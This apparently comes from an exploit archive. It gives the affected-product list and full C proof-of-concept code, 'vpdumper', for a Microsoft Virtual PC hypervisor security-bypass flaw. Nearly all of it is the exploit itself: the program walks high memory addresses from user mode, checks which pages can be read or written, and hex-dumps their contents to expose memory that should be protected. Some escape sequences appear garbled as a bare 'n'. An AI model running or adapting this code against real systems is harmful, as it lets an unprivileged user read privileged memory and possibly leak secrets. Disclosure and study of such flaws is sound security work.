|
=====================================================================================
Microsoft Virtual PC Hypervisor Virtual Machine Monitor Security Bypass Vulnerability
=====================================================================================
Vulnerable: Microsoft Windows Virtual PC 0
Microsoft Windows 7 XP Mode 0
Microsoft Virtual Server 2005 0
Microsoft Virtual PC 2007 SP1
Microsoft Virtual PC 2007 0
#include <windows.h>
#include <stdio.h>
#include <ctype.h>
#define ROWS 16
void find_leaked_memory ( void );
void print_data ( unsigned int , char * , unsigned int );
int main ( void )
{
/* message for users */
printf ( "n*********** vpdumper.exe ***********" );
printf ( "nCreated by Nicolas A. Economou ( neconomou@corest.com )" );
printf ( "nCore Security Technologies, Buenos Aires, Argentina ( 2010 )n" );
/* Search and Print leaked memory */
printf ( "nsearching leaked memoryn" );
find_leaked_memory ();
return ( 1 );
}
void find_leaked_memory ( void )
{
char buffer [ 0x1000 ];
char *base;
int r, w;
/* search the high address memory area */
for ( base = ( char * ) 0x80000000 ; base < ( char * ) 0xfffff000 ; base += 0x1000 )
{
/* Dark Area */
if ( ( unsigned int ) base == 0xe839c000 )
{
continue;
}
/* Inicialize flags */
r = FALSE;
w = FALSE;
/* check readable */
if ( IsBadReadPtr ( base , 1 ) == FALSE )
{
/* set flag */
r = TRUE;
}
/* check writeable */
if ( IsBadWritePtr ( base , 1 ) == FALSE )
{
/* set flag */
w = TRUE;
}
/* if readable or writeable */
if ( r == TRUE || w == TRUE )
{
/* get contents into our buffer */
memcpy ( buffer , base , 0x1000 );
/* print page attributes */
printf ( "attributes: " );
printf ( "%s" , ( r == TRUE ) ? "R":"" );
printf ( "%s" , ( w == TRUE ) ? "W":"" );
printf ( "n" );
/* print the memory */
print_data ( ( unsigned int ) base , buffer , 0x1000 );
}
}
}
void print_data ( unsigned int direccion , char *buffer , unsigned int bytes_a_imprimir )
{
unsigned int cont;
unsigned int i;
/* Imprimo las lineas encontradas */
for ( cont = 0 ; cont < bytes_a_imprimir ; cont = cont + ROWS )
{
/* Imprimo la direccion de la memoria */
printf ( "%.8x | " , direccion );
/* Incremento la direccion a mostrar */
direccion = direccion + ROWS;
/* Imprimo en hexa */
for ( i = 0 ; i < ROWS ; i ++ )
{
/* Imprimo la cantidad que pedi */
if ( i < ( bytes_a_imprimir - cont ) )
{
printf ( "%.2x " , ( unsigned char ) buffer [ i + cont ] );
}
else
{
printf ( " " );
}
}
/* Espacio entre las 2 columnas */
printf ( "| " );
/* Imprimo en caracteres */
for ( i = 0 ; i < ROWS ; i ++ )
{
if ( i < ( bytes_a_imprimir - cont ) )
{
printf ( "%c" , ( isgraph ( buffer [ i + cont ] ) ) ? buffer [ i + cont ] : '.' );
}
else
{
printf ( " " );
}
}
/* Fin de linea */
printf ( "n" );
}
}
|